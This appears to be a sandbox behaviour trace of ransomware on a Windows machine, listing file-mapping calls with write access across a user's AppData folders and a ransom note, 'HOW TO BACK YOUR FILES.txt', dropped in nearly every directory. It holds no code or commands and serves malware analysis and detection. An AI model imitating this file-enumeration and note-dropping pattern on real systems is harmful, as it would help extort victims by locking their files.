Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 334384 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, protection = PAGE_READWRITE, maximum_size = 297792 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, protection = PAGE_READWRITE, maximum_size = 269440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, protection = PAGE_READWRITE, maximum_size = 257136 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, protection = PAGE_READWRITE, maximum_size = 252224 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 285584 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 295296 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, protection = PAGE_READWRITE, maximum_size = 271424 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, protection = PAGE_READWRITE, maximum_size = 218352 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 256000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, protection = PAGE_READWRITE, maximum_size = 252112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, protection = PAGE_READWRITE, maximum_size = 345440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb, protection = PAGE_READWRITE, maximum_size = 201472 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw, protection = PAGE_READWRITE, maximum_size = 127744 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, protection = PAGE_READWRITE, maximum_size = 1312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol, protection = PAGE_READWRITE, maximum_size = 976 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, protection = PAGE_READWRITE, maximum_size = 19536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, protection = PAGE_READWRITE, maximum_size = 992 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, protection = PAGE_READWRITE, maximum_size = 8640 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, protection = PAGE_READWRITE, maximum_size = 1408 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, protection = PAGE_READWRITE, maximum_size = 1200 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\deployment.properties filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\deployment.properties, protection = PAGE_READWRITE, maximum_size = 1520 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\si\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\si\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\security\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\security\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\log\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\log\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Mozilla\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Mozilla\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\Services\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\Services\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157, protection = PAGE_READWRITE, maximum_size = 1120 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4, protection = PAGE_READWRITE, maximum_size = 1216 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04, protection = PAGE_READWRITE, maximum_size = 1216 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203, protection = PAGE_READWRITE, maximum_size = 1216 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506, protection = PAGE_READWRITE, maximum_size = 1104 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749, protection = PAGE_READWRITE, maximum_size = 1104 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157, protection = PAGE_READWRITE, maximum_size = 7376 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506, protection = PAGE_READWRITE, maximum_size = 53744 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749, protection = PAGE_READWRITE, maximum_size = 8576 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\nl_NL\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\nl_NL\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_US\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_US\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
